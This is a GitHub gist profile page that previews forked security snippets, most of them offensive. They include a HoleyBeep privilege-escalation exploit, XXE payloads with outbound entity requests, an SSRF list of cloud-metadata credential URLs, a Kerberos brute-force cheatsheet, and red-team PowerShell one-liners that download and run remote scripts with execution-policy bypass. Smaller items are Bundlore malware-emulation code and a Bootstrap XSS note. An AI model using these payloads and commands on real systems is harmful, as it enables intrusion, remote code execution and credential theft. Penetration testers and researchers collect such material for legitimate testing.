Skip to content

Instantly share code, notes, and snippets.

View gdraperi's full-sized avatar

gdraperi

8 followers · 1 following
View GitHub Profile
@gdraperi
gdraperi / README.md
Created April 11, 2018 12:30 — forked from Arignir/README.md
HoleyBeep exploit

HoleyBeep

This is an exploit for HoleyBeep.

To use it, place any command you want root to execute in /tmp/x.

$ cat /tmp/x
echo PWNED $(whoami)
@gdraperi
gdraperi / XXE_payloads
Created July 3, 2018 09:50 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@gdraperi
gdraperi / cloud_metadata.txt
Created November 30, 2018 08:08 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
@gdraperi
gdraperi / arch-linux-install
Created February 7, 2019 16:55 — forked from mattiaslundberg/arch-linux-install
Minimal instructions for installing arch linux on an UEFI system with full system encryption using dm-crypt and luks
# Install ARCH Linux with encrypted file-system and UEFI
# The official installation guide (https://wiki.archlinux.org/index.php/Installation_Guide) contains a more verbose description.
# Download the archiso image from https://www.archlinux.org/
# Copy to a usb-drive
dd if=archlinux.img of=/dev/sdX bs=16M && sync # on linux
# Boot from the usb. If the usb fails to boot, make sure that secure boot is disabled in the BIOS configuration.
# Set swedish keymap
@gdraperi
gdraperi / kerberos_attacks_cheatsheet.md
Created August 28, 2019 15:01 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@gdraperi
gdraperi / RedTeam_CheatSheet.ps1
Created November 21, 2019 15:42 — forked from m8sec/RedTeam_CheatSheet.ps1
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
@gdraperi
gdraperi / PowerView-3.0-tricks.ps1
Created November 21, 2019 15:45 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@gdraperi
gdraperi / bundlore_emulation.py
Created December 11, 2019 12:13 — forked from tahaconfiant/bundlore_emulation.py
bundlore_emulation
from unicorn import *
from unicorn.x86_const import *
from abc import ABC, abstractmethod
class bundlore_emulation(ABC):
def __init__(self):
self.mu = Uc(UC_ARCH_X86, UC_MODE_64)
self.BASE = 0x100000000
self.HEAP_SIZE = 64*1024
self.STACK_SIZE= 32*1024
@gdraperi
gdraperi / follow_fork_child.py
Created December 11, 2019 12:13 — forked from tahaconfiant/follow_fork_child.py
follow_fork_child
# by taha@confiant.com
# LLDB custom command follow-fork-child, equivalent to GDB "follow-fork-mode child"
# tested on $lldb --version
# lldb-1100.0.30.6
# Apple Swift version 5.1.2 (swiftlang-1100.0.278 clang-1100.0.33.9)
# (lldb) script
# Python Interactive Interpreter. To exit, type 'quit()', 'exit()' or Ctrl-D.
# >>> import sys
# >>> print(sys.version)
@gdraperi
gdraperi / Bootstrap_XSS.md
Created December 12, 2019 08:20 — forked from BlackFan/Bootstrap_XSS.md
Bootstrap XSS Collection

CVE-2019-8331

Bootstrap < 3.4.1 || < 4.3.1

✔️ CSP strict-dynamic bypass

➖ Requires user interaction

➖ Requires $('[data-toggle="tooltip"]').tooltip();